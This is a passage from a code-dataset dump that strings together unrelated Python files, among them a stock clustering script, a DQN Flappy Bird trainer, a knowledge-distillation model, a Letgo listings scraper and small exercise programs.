datetime.datetime(2012, 1, 1)\n\td2 = datetime.datetime(2014, 1, 1)\n\treturn d1, d2\n\ndef getTickers():\n\twith open('tickers', mode='r') as infile:\n\t    reader = csv.reader(infile)\n\t    tickers = {rows[0]:rows[1] for rows in reader}\n\t    return tickers\n\ndef
getInstruments(tickers):\n\tsymbols, names = np.array(tickers.items()).T\n\treturn symbols, names\n\ndef getData(symbols, d1, d2):\n\tquotes = [finance.quotes_historical_yahoo(symbol, d1, d2, asobject=True)\n\t          for symbol in symbols]\n\treturn quotes\n\ndef fitData(quotes):\n\topenPrice = np.array([q.open.astype(np.float) for q in quotes])\n\tclosePrice = np.array([q.close.astype(np.float) for q in quotes])\n\treturn openPrice, closePrice\n\n\ndef main():\n\td1, d2 = getDates()\n\ttickers = getTickers()\n\tfor ticker, name in tickers.iteritems():\n\t\tprint(ticker+', '+name)\n\n\n\tsymbols, names = getInstruments(tickers)\n\tquotes = getData(symbols, d1, d2)\n\n\topenPrice, closePrice = fitData(quotes)\n\t#trimmedQuotes = trimMatix(closePrice)\n\n\t# The daily variations of the quotes are what carry most information\n\t# variation = closePrice - openPrice\n\n\n\t###############################################################################\n\t# Learn a graphical structure from the correlations\n\tedge_model = covariance.GraphLassoCV()\n\n\t# # standardize the time series: using correlations rather than covariance\n\t# # is more efficient for structure recovery\n\tX = closePrice.copy().T\n\tX /= X.std(axis=0)\n\tedge_model.fit(X)\n\n\n\n\t\t###############################################################################\n\t# Cluster using affinity propagation\n\n\t_, labels = cluster.affinity_propagation(edge_model.covariance_)\n\tn_labels = labels.max()\n\n\tfor i in range(n_labels + 1):\n\t    print('Cluster %i: %s' % ((i + 1), ', '.join(names[labels == i])))\n\n\t###############################################################################\n\t# Find a low-dimension embedding for visualization: find the best position of\n\t# the nodes (the stocks) on a 2D plane\n\n\t# We use a dense eigen_solver to achieve reproducibility (arpack is\n\t# initiated with random vectors that we don't control). In addition, we\n\t# use a large number of neighbors to capture the large-scale structure.\n\tnode_position_model = manifold.LocallyLinearEmbedding(\n\t    n_components=2, eigen_solver='dense', n_neighbors=6)\n\n\tembedding = node_position_model.fit_transform(X.T).T\n\n\t###############################################################################\n\t# Visualization\n\tplt.figure(1, facecolor='w', figsize=(10, 8))\n\tplt.clf()\n\tax = plt.axes([0., 0., 1., 1.])\n\tplt.axis('off')\n\n\t# Display a graph of the partial correlations\n\tpartial_correlations = edge_model.precision_.copy()\n\td = 1 / np.sqrt(np.diag(partial_correlations))\n\tpartial_correlations *= d\n\tpartial_correlations *= d[:, np.newaxis]\n\tnon_zero = (np.abs(np.triu(partial_correlations, k=1)) > 0.02)\n\n\t# Plot the nodes using the coordinates of our embedding\n\tplt.scatter(embedding[0], embedding[1], s=100 * d ** 2, c=labels,\n\t            cmap=plt.cm.spectral)\n\n\t# Plot the edges\n\tstart_idx, end_idx = np.where(non_zero)\n\t#a sequence of (*line0*, *line1*, *line2*), where::\n\t#            linen = (x0, y0), (x1, y1), ... (xm, ym)\n\tsegments = [[embedding[:, start], embedding[:, stop]]\n\t            for start, stop in zip(start_idx, end_idx)]\n\tvalues = np.abs(partial_correlations[non_zero])\n\tlc = LineCollection(segments,\n\t                    zorder=0, cmap=plt.cm.hot_r,\n\t                    norm=plt.Normalize(0, .7 * values.max()))\n\tlc.set_array(values)\n\tlc.set_linewidths(15 * values)\n\tax.add_collection(lc)\n\n\t# Add a label to each node.
The challenge here is that we want to\n\t# position the labels to avoid overlap with other labels\n\tfor index, (name, label, (x, y)) in enumerate(\n\t        zip(names, labels, embedding.T)):\n\n\t    dx = x - embedding[0]\n\t    dx[index] = 1\n\t    dy = y - embedding[1]\n\t    dy[index] = 1\n\t    this_dx = dx[np.argmin(np.abs(dy))]\n\t    this_dy = dy[np.argmin(np.abs(dx))]\n\t    if this_dx > 0:\n\t        horizontalalignment = 'left'\n\t        x = x + .002\n\t    else:\n\t        horizontalalignment = 'right'\n\t        x = x - .002\n\t    if this_dy > 0:\n\t        verticalalignment = 'bottom'\n\t        y = y + .002\n\t    else:\n\t        verticalalignment = 'top'\n\t        y = y - .002\n\t    plt.text(x, y, name, size=10,\n\t             horizontalalignment=horizontalalignment,\n\t             verticalalignment=verticalalignment,\n\t             bbox=dict(facecolor='w',\n\t                       edgecolor=plt.cm.spectral(label / float(n_labels)),\n\t                       alpha=.6))\n\n\tplt.xlim(embedding[0].min() - .15 * embedding[0].ptp(),\n\t         embedding[0].max() + .10 * embedding[0].ptp(),)\n\tplt.ylim(embedding[1].min() - .03 * embedding[1].ptp(),\n\t         embedding[1].max() + .03 * embedding[1].ptp())\n\n\tplt.show()\n\nmain()\n\n\n","sub_path":"symbolmap.py","file_name":"symbolmap.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"357417113","text":"from random import randint\nv = 0\nwhile True:\n    player = int(input(\"Let's play even or odd? Pick a number! -> \"))\n    pc = randint(0, 10)\n    total = player + pc\n    tipo = ' '\n    while tipo not in \"PI\":\n        tipo = str(input('Do you want even or odd? [P/I] ')).strip().upper()[0]\n    print(f'You played {player} and the computer played {pc}. The total is {total}! ', end='')\n    if tipo == 'P':\n        if total % 2 == 0:\n            print('You win!')\n            v += 1\n        else:\n            print('You lose!')\n            break\n    elif tipo == 'I':\n        if total % 2 == 1:\n            print('You win!')\n            v += 1\n        else:\n            print('You lose!')\n            break\n    print('Shall we play again...?')\nprint(f'Game over!
You won {v} times.')","sub_path":"ex068a.py","file_name":"ex068a.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"14803515","text":"def is_even(num):\n    if num % 2 == 0:\n        return True\n    else:\n        return False\n\n\nn, a, b = map(int, input().split())\ntables = [n] * 2\nif is_even(a) and is_even(b):\n    print(abs(a - b) // 2)\nelif not is_even(a) and not is_even(b):\n    print(abs(a - b) // 2)\nelse:\n    print(min(abs(1 - a), abs(b - n)) + 1 + (b - a - 1) // 2)\n","sub_path":"python/AGC041/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"500545398","text":"\n\n#class header\nclass _WET():\n\tdef __init__(self,): \n\t\tself.name = \"WET\"\n\t\tself.definitions = [u'to make something wet: ', u'to urinate in your clothes by accident', u'to urinate in your bed by accident: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_wet.py","file_name":"_wet.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"427438985","text":"import os, glob\nimport torch\nimport numpy as np\nimport torch.nn.functional as F\nfrom .base_model import BaseModel\nfrom .teacher_networks import TeacherModel, TeacherModel_AVL\nfrom .networks.classifier import LSTMClassifier, FcClassifier, EF_model\nfrom .networks.tools import init_net\nfrom .networks.spectral_loss import SpectralLoss, OrthPenalty\nfrom .networks.soft_center_loss import SoftCenterLoss\n\nclass SpectralModel(BaseModel):\n    @staticmethod\n    def modify_commandline_options(parser, is_train=True):\n        # parser.set_defaults(no_dropout=True)\n        parser.add_argument('--mid_layers', type=str, default='256,128', help='256,128 for 2 layers with 256, 128 nodes respectively')\n        parser.add_argument('--input_dim_a', type=int, default=1582, help='input dim for acoustic domain')\n        parser.add_argument('--input_dim_l', type=int, default=1024, help='input dim for lexical domain')\n        parser.add_argument('--hidden_size', type=int, default=512, help='hidden size for lstm')\n        parser.add_argument('--lstm_fc1_size', type=int, default=256, help='fc size for lstm_classifier')\n        parser.add_argument('--fusion_size', type=int, default=128, help='fusion latent vector size in fusion model')\n        parser.add_argument('--output_dim', type=int, default=4, help='output dim')\n        parser.add_argument('--dropout_rate', type=float, default=0.2, help='rate of dropout')\n        parser.add_argument('--teacher_path', type=str, default='/data2/ljj/SSER_model/setup_ss_batchsize_128_lr_0.001_tgt_discrete_mark_IS10+bert+decoder+mmd+0.3+negative+valid_ami/')\n        # parser.add_argument('--kd_weight', type=float, default=1.0, help='weight of kd loss')\n        parser.add_argument('--pretrained_dir', type=str, default='checkpoints/spec_pretrained_dir')\n        parser.add_argument('--kd_temp', type=float, default=3.0, help='knowledge distilling temperature')\n        parser.add_argument('--kd_start_epoch', type=int, default=10, help='knowledge distilling start epoch')\n        parser.add_argument('--cvNo', type=int, help='which cross validation set')\n        parser.add_argument('--modality', type=str, help='which modality to use for student model')\n
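        # A hedged sketch (added for illustration; '_example_layers' is not an
        # original name): this is how the --mid_layers string is consumed in
        # __init__ below, turning the comma-separated value into hidden-layer
        # sizes for FcClassifier:
        _example_layers = list(map(lambda x: int(x), '256,128'.split(',')))  # -> [256, 128]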
        parser.add_argument('--adjacent_path', type=str, help='path to adjacent matrix file')\n        parser.add_argument('--orth_weight', type=float, help='weight of orthogonal penalty')\n        parser.add_argument('--spec_weight', type=float, help='weight of spectral loss')\n        parser.add_argument('--center_weight', type=float, default=0.0, help='weight of soft center weight')\n        return parser\n\n    def __init__(self, opt):\n        \"\"\"Initialize the LSTM autoencoder class\n\n        Parameters:\n            opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions\n        \"\"\"\n        super().__init__(opt)\n        self.teacher_path = os.path.join(opt.teacher_path, f'cvNo{opt.cvNo}')\n        self.teacher_model = TeacherModel_AVL(self.teacher_path, fusion_dim=384).cuda()\n        self.loss_names = ['KD', 'spec', 'orth', 'center']\n        self.modality = opt.modality\n        # acoustic student model\n        if self.modality == 'acoustic':\n            self.model_names = ['A'] \n            layers = list(map(lambda x: int(x), opt.mid_layers.split(',')))\n            self.netA = init_net(FcClassifier(opt.input_dim_a, layers, opt.output_dim), \n                                opt.init_type, opt.init_gain, gpu_ids=opt.gpu_ids)\n\n        # lexical student model\n        elif self.modality == 'lexical':\n            self.model_names = ['L']\n            self.netL = init_net(LSTMClassifier(opt.input_dim_l, opt.hidden_size, \n                                opt.lstm_fc1_size, opt.output_dim, opt.dropout_rate),\n                                opt.init_type, opt.init_gain, gpu_ids=opt.gpu_ids)\n            # input_size, hidden_size, fc1_size, output_size, dropout_rate\n        \n        elif self.modality == 'A+L':\n            self.model_names = ['A_L']\n            layers = list(map(lambda x: int(x), opt.mid_layers.split(',')))\n            fc_classifier = FcClassifier(opt.input_dim_a, layers, opt.output_dim) \n            lstm_classifier = LSTMClassifier(opt.input_dim_l, opt.hidden_size, \n                                opt.lstm_fc1_size, opt.output_dim, opt.dropout_rate)\n            \n            self.netA_L = init_net(EF_model(fc_classifier, lstm_classifier, layers[-1], opt.lstm_fc1_size, \n                                opt.fusion_size, opt.output_dim, opt.dropout_rate),\n                                opt.init_type, opt.init_gain, gpu_ids=opt.gpu_ids)\n            # fc_classifier, lstm_classifier, out_dim_a, out_dim_v, fusion_size, num_class\n        if self.isTrain:\n            self.adjacent = np.load(opt.adjacent_path)\n            self.criterion_kd = torch.nn.BCELoss()\n            self.criterion_spec = SpectralLoss(self.adjacent)\n            self.criterion_orth = OrthPenalty()\n            self.criterion_center = SoftCenterLoss(4, layers[-1] if self.modality=='acoustic' \n                                                    else opt.fusion_size)\n            # initialize optimizers; schedulers will be automatically created by function <BaseModel.setup>.\n            self.optimizer = torch.optim.Adam(\n                getattr(self, 'net'+self.model_names[0]).parameters(), \n                lr=opt.lr, betas=(opt.beta1, 0.999))\n            # self.optimizer_clf = torch.optim.Adam(self.netA.module.fc_out.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n            # print(self.netA.module.[-1])\n            # input()\n            self.optimizers.append(self.optimizer)\n            self.temp = opt.kd_temp\n            self.spec_weight = opt.spec_weight\n            self.orth_weight = opt.orth_weight\n            self.kd_start_epoch = opt.kd_start_epoch\n            self.center_weight = opt.center_weight\n        \n        # init parameter from pretrained model\n        if self.isTrain and opt.pretrained_dir != \"None\":\n            print(os.path.join(opt.pretrained_dir, str(opt.cvNo), '*_net_{}'.format(self.model_names[0])))\n            model_path = glob.glob(\n                os.path.join(opt.pretrained_dir, str(opt.cvNo), '*_net_{}.pth'.format(self.model_names[0])))[0]\n            getattr(self, 'net'+self.model_names[0]).module.load_state_dict(torch.load(model_path))\n            print(\"Model init from {}\".format(model_path))\n\n        # modify save_dir\n        self.save_dir = os.path.join(self.save_dir, str(opt.cvNo))\n        if not
os.path.exists(self.save_dir):\n            os.mkdir(self.save_dir)\n    \n    def set_input(self, input):\n        \"\"\"Unpack input data from the dataloader and perform necessary pre-processing steps.\n\n        Parameters:\n            input (dict): include the data itself and its metadata information.\n\n        \"\"\"\n        self.acoustic = input['acoustic'].float().cuda()\n        self.lexical = input['lexical'].float().cuda()\n        self.visual = input['visual'].float().cuda()\n        self.label = input['label'].cuda()\n        self.index = input['index'].cuda()\n        # self.label = self.label.argmax(dim=1)\n\n    def forward(self):\n        \"\"\"Run forward pass; called by both functions <optimize_parameters> and <test>.\"\"\"\n        if self.isTrain:\n            with torch.no_grad():\n                self.teacher_logits = self.teacher_model(self.acoustic, self.lexical, self.visual)\n                self.teacher_pred = F.softmax(self.teacher_logits / self.temp, dim=-1)\n        # for acoustic modality\n        if self.modality == 'acoustic':\n            self.student_logits, self.student_feat = self.netA(self.acoustic)\n        # for lexical modality\n        elif self.modality == 'lexical':\n            self.student_logits, self.student_feat = self.netL(self.lexical)\n        elif self.modality == 'A+L':\n            self.student_logits, self.student_feat = self.netA_L(self.acoustic, self.lexical)\n        \n\n        self.student_pred = F.softmax(self.student_logits / self.temp, dim=1)\n\n    def backward(self, kd_start):\n        \"\"\"Calculate the loss \"\"\"\n        if kd_start:\n            self.loss_KD = self.criterion_kd(self.student_pred, self.teacher_pred)\n        else:\n            self.loss_KD = torch.tensor(0).cuda()\n\n        self.loss_spec = self.spec_weight * self.criterion_spec(self.student_feat, self.index)\n        self.loss_orth = self.orth_weight * self.criterion_orth(self.student_feat)\n        self.loss_center = self.center_weight * self.criterion_center(self.student_feat, self.teacher_pred)\n        loss = self.loss_KD + self.loss_spec + self.loss_orth + self.loss_center\n        loss.backward()\n        torch.nn.utils.clip_grad_norm_(getattr(self, 'net'+self.model_names[0]).parameters(), 0.1)\n\n    def backward_spec(self):\n        \"\"\"Calculate the loss for reconstruct feature\"\"\"\n        # if kd_start:\n        #     self.loss_KD = self.criterion_kd(self.student_pred, self.teacher_pred)\n        # else:\n        #     self.loss_KD = torch.tensor(0).cuda()\n        \n        self.loss_spec = self.spec_weight * self.criterion_spec(self.student_feat, self.index)\n        self.loss_orth = self.orth_weight * self.criterion_orth(self.student_feat)\n        self.loss_KD = torch.tensor(0).cuda() \n        # loss = self.loss_KD + self.loss_spec # + self.loss_orth\n        loss = self.loss_spec + self.loss_orth\n        loss.backward(retain_graph=True)\n        torch.nn.utils.clip_grad_norm_(getattr(self, 'net'+self.model_names[0]).parameters(), 0.1)\n    \n    def backward_clf(self):\n        \"\"\"Calculate the loss for reconstruct feature\"\"\"\n        self.loss_KD = self.criterion_kd(self.student_pred, self.teacher_pred)\n        self.loss_KD.backward()\n        torch.nn.utils.clip_grad_norm_(self.netA.parameters(), 1)\n        self.loss_spec = torch.tensor(0).cuda() \n        self.loss_orth = torch.tensor(0).cuda() \n\n    def optimize_parameters(self, epoch):\n        \"\"\"Calculate losses, gradients, and update network weights; called in every training iteration\"\"\"\n        # forward\n        self.forward()   \n        # backward\n        self.optimizer.zero_grad()  \n        self.backward(epoch>=self.kd_start_epoch)\n        self.optimizer.step()\n        # # backward\n        # if epoch <= self.kd_start_epoch:\n        #     self.optimizer.zero_grad()  \n        #     self.backward_spec()\n        #     self.optimizer.step()\n        # else:\n        #     # backward clf\n        #     self.optimizer_clf.zero_grad()\n        #     self.backward_clf()  \n        #
     self.optimizer_clf.step()","sub_path":"models/spectral_model.py","file_name":"spectral_model.py","file_ext":"py","file_size_in_byte":10526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"104397673","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport cv2\nimport sys\nsys.path.append(\"game/\")\nimport wrapped_flappy_bird as game\nimport random\nimport numpy as np\nfrom collections import deque\n\nGAME = 'bird' # the name of the game being played for log files\nACTIONS = 2 # number of valid actions\nGAMMA = 0.99 # decay rate of past observations\nOBSERVE = 100000. # timesteps to observe before training\nEXPLORE = 2000000. # frames over which to anneal epsilon\nFINAL_EPSILON = 0.0001 # final value of epsilon\nINITIAL_EPSILON = 0.0001 # starting value of epsilon\nREPLAY_MEMORY = 50000 # number of previous transitions to remember\nBATCH = 32 # size of minibatch\nFRAME_PER_ACTION = 1\n\ndef show_img(img,window_name='img'):\n    cv2.imshow(window_name,img)\n    cv2.waitKey(0)\n    cv2.destroyAllWindows()\n\ndef preprocess_img(img):\n    # Resize the image to 80*80\n    img=cv2.resize(img, (80, 80))\n    # Convert to grayscale\n    img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n    # Binarize the image\n    _, img = cv2.threshold(img,1,255,cv2.THRESH_BINARY)\n    return img\n\ndef create_network():\n    # Input layer: 80 (height) * 80 (width) * 4 (pixel value at each position across 4 consecutive frames)\n    input_layer = tf.placeholder(\"float\", [None, 80, 80, 4])\n\n    # Build a truncated-normal weight tensor for the given shape\n    def weight_variable(shape):\n        initial = tf.truncated_normal(shape, stddev = 0.01)\n        return tf.Variable(initial)\n    \n    # Build a bias tensor for the given shape\n    def bias_variable(shape):\n        initial = tf.constant(0.01, shape = shape)\n        return tf.Variable(initial)\n\n    # 2D image convolution\n    def conv2d(x, W, stride):\n        return tf.nn.conv2d(x, W, strides = [1, stride, stride, 1], padding = \"SAME\")\n\n    # Hidden layers\n    # Convolution + pooling layer 1\n    W_conv1 = weight_variable([8, 8, 4, 32]) \n    b_conv1 = bias_variable([32]) \n    h_conv1 = tf.nn.relu(conv2d(input_layer, W_conv1, 4) + b_conv1)\n    def max_pool_2x2(x):\n        return tf.nn.max_pool(x, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = \"SAME\")\n    h_pool1 = max_pool_2x2(h_conv1)\n\n    # Convolution layer 2\n    W_conv2 = weight_variable([4, 4, 32, 64])\n    b_conv2 = bias_variable([64])\n    h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2, 2) + b_conv2)\n\n    # Convolution layer 3\n    W_conv3 = weight_variable([3, 3, 64, 64])\n    b_conv3 = bias_variable([64])\n    h_conv3 = tf.nn.relu(conv2d(h_conv2, W_conv3, 1) + b_conv3)\n    h_conv3_flat = tf.reshape(h_conv3, [-1, 1600])\n    \n    # Fully connected layer\n    W_fc1 = weight_variable([1600, 512])\n    b_fc1 = bias_variable([512])\n    h_fc1 = tf.nn.relu(tf.matmul(h_conv3_flat, W_fc1) + b_fc1)\n\n    # Output layer\n    W_fc2 = weight_variable([512, ACTIONS])\n    b_fc2 = bias_variable([ACTIONS])\n    readout = tf.matmul(h_fc1, W_fc2) + b_fc2\n\n    return input_layer, readout, h_fc1\n\ndef train_network(s, readout, h_fc1, sess):\n    # Define the loss function\n    a = tf.placeholder(\"float\", [None, ACTIONS])\n    y = tf.placeholder(\"float\", [None])\n    readout_action = tf.reduce_sum(tf.multiply(readout, a), reduction_indices=1)\n    cost = tf.reduce_mean(tf.square(y - readout_action))\n    \n    # Training objective\n    train_step = tf.train.AdamOptimizer(1e-6).minimize(cost)\n\n    # open up a game state to communicate with emulator\n    game_state = game.GameState()\n\n    # Replay memory\n    mem = deque()\n\n    # printing\n    a_file = open(\"logs_\" + GAME + \"/readout.txt\", 'w')\n    h_file = open(\"logs_\" + GAME + \"/hidden.txt\", 'w')\n\n    \n    do_nothing = np.zeros(ACTIONS)\n    do_nothing[0] = 1\n    \n    # Get the initial state; preprocess the image down to 80*80 grayscale\n    img, _, _ =
game_state.frame_step(do_nothing)\n    img=preprocess_img(img)\n    state = np.stack((img, img, img, img), axis=2)\n\n    # Save and load the network\n    saver = tf.train.Saver()\n    sess.run(tf.initialize_all_variables())\n    checkpoint = tf.train.get_checkpoint_state(\"saved_networks\")\n    if checkpoint and checkpoint.model_checkpoint_path:\n        saver.restore(sess, checkpoint.model_checkpoint_path)\n        print(\"Successfully loaded:\", checkpoint.model_checkpoint_path)\n    else:\n        print(\"Could not find old network weights\")\n\n    # Start training\n    epsilon = INITIAL_EPSILON\n    t = 0\n    while True:\n        # choose an action epsilon-greedily\n        readout_t = readout.eval(feed_dict={s : [state]})[0]\n        a_t = np.zeros([ACTIONS])\n        action_index = 0\n        if t % FRAME_PER_ACTION == 0:\n            if random.random() <= epsilon:\n                print(\"----------Random Action----------\")\n                action_index = random.randrange(ACTIONS)\n                a_t[random.randrange(ACTIONS)] = 1\n            else:\n                action_index = np.argmax(readout_t)\n                a_t[action_index] = 1\n        else:\n            a_t[0] = 1 # do nothing\n\n        # Gradually anneal epsilon as training progresses\n        if epsilon > FINAL_EPSILON and t > OBSERVE:\n            epsilon -= (INITIAL_EPSILON - FINAL_EPSILON) / EXPLORE\n\n        # Execute the selected action and observe the next state and the reward\n        img, reward, terminal = game_state.frame_step(a_t)\n        img=preprocess_img(img)\n        img = np.reshape(img, (80, 80, 1))\n        state_ = np.append(img, state[:, :, :3], axis=2)\n\n        # Store the transition in replay memory\n        mem.append((state, a_t, reward, state_, terminal))\n        \n        if len(mem) > REPLAY_MEMORY:\n            mem.popleft()\n\n        # only train if done observing\n        if t > OBSERVE:\n            # Sample a minibatch from replay memory as training examples\n            minibatch = random.sample(mem, BATCH)\n\n            # Batch variables\n            S = [d[0] for d in minibatch]\n            A = [d[1] for d in minibatch]\n            R = [d[2] for d in minibatch]\n            S_ = [d[3] for d in minibatch]\n\n            Y = []\n            S_readout = readout.eval(feed_dict = {s : S_})\n            for i in range(0, len(minibatch)):\n                terminal = minibatch[i][4]\n                # if terminal, only equals reward\n                if terminal:\n                    Y.append(R[i])\n                else:\n                    Y.append(R[i] + GAMMA * np.max(S_readout[i]))\n\n            # Adjust the network weights with a gradient-descent step\n            train_step.run(feed_dict = {\n                y : Y,\n                a : A,\n                s : S}\n            )\n\n        # Update the state\n        state=state_\n        t += 1\n\n        # save progress every 10000 iterations\n        if t % 10000 == 0:\n            saver.save(sess, 'saved_networks/' + GAME + '-dqn', global_step = t)\n\n        # print info\n        phase = \"\"\n        if t <= OBSERVE:\n            phase = \"observe\"\n        elif t > OBSERVE and t <= OBSERVE + EXPLORE:\n            phase = \"explore\"\n        else:\n            phase = \"train\"\n\n        print(\"timestep\", t,\n            \" phase\", phase,\n            \" epsilon\", epsilon,\n            \" action\", action_index,\n            \" reward\", reward,\n            \" q_max %e\" % np.max(readout_t))\n        \n        ### write info to files\n        # if t % 10000 <= 100:\n        #     a_file.write(\",\".join([str(x) for x in readout_t]) + '\\n')\n        #     h_file.write(\",\".join([str(x) for x in h_fc1.eval(feed_dict={s:[s_t]})[0]]) + '\\n')\n        #     cv2.imwrite(\"logs_tetris/frame\" + str(t) + \".png\", x_t1)\n\nif __name__ == \"__main__\":\n    sess = tf.InteractiveSession()\n    s, readout, h_fc1 = create_network()\n    train_network(s, readout, h_fc1, sess)\n","sub_path":"deep_q_network.py","file_name":"deep_q_network.py","file_ext":"py","file_size_in_byte":7438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606926380","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport json\nimport requests\nimport re\nfrom time import sleep\nimport sys\n\nclass LetgoSpider(scrapy.Spider):\n    name = 'letgo'\n    allowed_domains = ['letgo.com/en', 'search-products-pwa.letgo.com']\n    start_urls =
['https://search-products-pwa.letgo.com/api/products?country_code=US&offset=0&quadkey=0320030123201&num_results=50&distance_radius=50&distance_type=mi']\n    offset = 0\n    \n    def parse(self, response):\n        data = json.loads(response.text)\n        if len(data) == 0:\n            sys.exit()\n        else:\n            for used_item in data:\n                try:\n                    if used_item['name'] == None:\n                        title = used_item['image_information']\n                    else:\n                        title = used_item['name']\n                    id_number = used_item['id']\n                    price = used_item['price']\n                    description = used_item['description']\n                    date = used_item['updated_at']\n                    images = [img['url'] for img in used_item['images']]\n                    latitude = used_item['geo']['lat']\n                    longitude = used_item['geo']['lng']\n                    link = 'https://us.letgo.com/en/i/' + re.sub(r'\\W+', '-', title) + '_' + id_number\n                    location = used_item['geo']['city']\n                except:\n                    pass\n\n                yield {'Title': title,\n                    'Url': link,\n                    'Price': price,\n                    'Description': description,\n                    'Date': date,\n                    'Images': images,\n                    'Latitude': latitude,\n                    'Longitude': longitude,\n                    'Location': location,\n                    }   \n        \n        self.offset += 50\n        new_request = 'https://search-products-pwa.letgo.com/api/products?country_code=US&offset=' + str(self.offset) + \\\n        '&quadkey=0320030123201&num_results=50&distance_radius=50&distance_type=mi'\n        print('new request is: ' + new_request)\n        sleep(1)\n        yield scrapy.Request(new_request, callback=self.parse)\n        \n    \n","sub_path":"final_project/build/lib/final_project/spiders/letgo.py","file_name":"letgo.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"485235348","text":"# -*- coding: utf-8 -*-\nfrom Arya.backends.base_module import BaseSaltMoude\nimport os\nfrom Arya.backends import tasks\n\nclass State(BaseSaltMoude):\n\n    def apply(self):\n        \"\"\"\n        Parse the task\n        Execute the task\n        Put it on the task queue\n        Return the task queue id\n        :return:\n        \"\"\"\n        if '-f' in self.sys_args:\n            # yaml config file\n            yaml_file_index = self.sys_args.index('-f') + 1\n\n            try:\n                # save the config file\n                yaml_file_name = self.sys_args[yaml_file_index]\n                state_data = self.load_state_files(yaml_file_name)\n\n                # generate a different config file for each operating system\n                for os_type, os_type_data in self.config_data_dic.items():\n\n                    for section_name, section_data in state_data.items():\n                        # print(section_name)\n                        for mod_name, mod_data in section_data.items():\n                            # print('  ', mod_name)  # user.present\n\n                            # based on the name in the config file, check whether this module exists in plugins\n                            base_mode_name = mod_name.split('.')[0]  # user\n\n                            module_obj = self.get_module_instance(base_mode_name=base_mode_name, os_type=os_type)\n                            moudle_parse_result = module_obj.syntax_parser(section_name, mod_name, mod_data, os_type)\n                            self.config_data_dic[os_type].append(moudle_parse_result)\n\n                print('config_data_dic'.center(60, '*'))\n                print(self.config_data_dic)\n\n                # build the task MQ message\n                new_task_obj = tasks.TaskHandle(self.db_models,self.config_data_dic,self.settings,self)\n                new_task_obj.dispatch_task() # dispatch the task\n\n            except IndexError as e:\n                exit('a state file must follow -f')\n\n        else:\n            exit('a state file must follow -f')\n\n","sub_path":"stack/Arya/plugins/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"146810183","text":"# Christopher Chay\n# 2016.3.31\n# Assignment 8: Error Handling\n# Grade: ---\n\ndef createSuper( x, y, z, a ):\n    x, y, z, a = x, y, z, a\n    return 'Superhero: ' + str(x) + '\\n' + \\\n           'Secret Identity: ' + str(y) + '\\n' + \\\n           'Age: ' + str(z) + '\\n' + \\\n           'Powers: ' + int(a)\n    \n\ntry:\n    super1 = createSuper( 'Spider Man', 'Peter
Parker', 20, 'Wall crawling, super strength, agility, web' )\n super2 = createSuper( 'Captain America', 'Steve Rogers', 18, 'Super strength, Super-high Endurance, Super-speed' )\n super3 = createSuper( 'Super Man', 'Clark Kent', 32, 'Super strength, Flight, Laser-vision, Heat-Vision, Icy-Breath' )\n\nexcept ValueError as e:\n print( '\\nError Message:', e, '\\n' )\nexcept TypeError as e:\n print( '\\nError Message:', e, '\\n' )\nexcept AttributeError as e:\n print( '\\nError Message:', e, '\\n' )\nexcept NameError as e:\n print( '\\nError Message:', e, '\\n' )\nelse:\n print( str(super1) + '\\n\\n' + str(super2) + '\\n\\n' + str(super3) ) \n \n\n \n","sub_path":"c2/python/prog.100/assignments/assignment8_ErrorHandling.py","file_name":"assignment8_ErrorHandling.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"40388038","text":"import collections\n\nfile = open(\"input/day24\",\"r\")\ninput = file.read().strip().splitlines()\n\ndef build(input):\n dic = collections.defaultdict(set)\n lis = [x.split('/') for x in input]\n lis = [(int(a),int(b)) for a,b in lis]\n for x,y in lis:\n dic[x].add(y)\n dic[y].add(x)\n return dic\n\n\ndef generator(base,comps):\n brid = base[-1][1]\n for el in comps[brid]:\n if not ((brid, el) in base or (el, brid) in base):\n bridge = base+[(brid, el)]\n yield bridge\n yield from generator(bridge,comps)\n\n\ndef task1():\n elements = build(input)\n max = 0\n basic = [(0,0)]\n for bridge in generator(basic,elements):\n a = sum(a+b for a, b in bridge)\n if a > max:\n max = a\n print(max)\n\ndef task2():\n elements = build(input)\n maxbridge = collections.defaultdict(set)\n basic = [(0,0)]\n for bridge in generator(basic,elements):\n dif = sum(a+b for a, b in bridge)\n maxbridge[len(bridge)].add(dif)\n \n print(max(maxbridge[max(maxbridge, key=int)]))\n\n\ntask1()\ntask2()","sub_path":"2017/day24.py","file_name":"day24.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"181335537","text":"\n\nimport cPickle as cP\nimport numpy as np\nfrom universal import *\n#import pylab as plt\n\nevol, AgeMatch, RangeMass = cP.load(open(picklePath+'marigoETAL2008.pickle','rb'))\n\ndef checkMassRange(mass):\n RangeDict 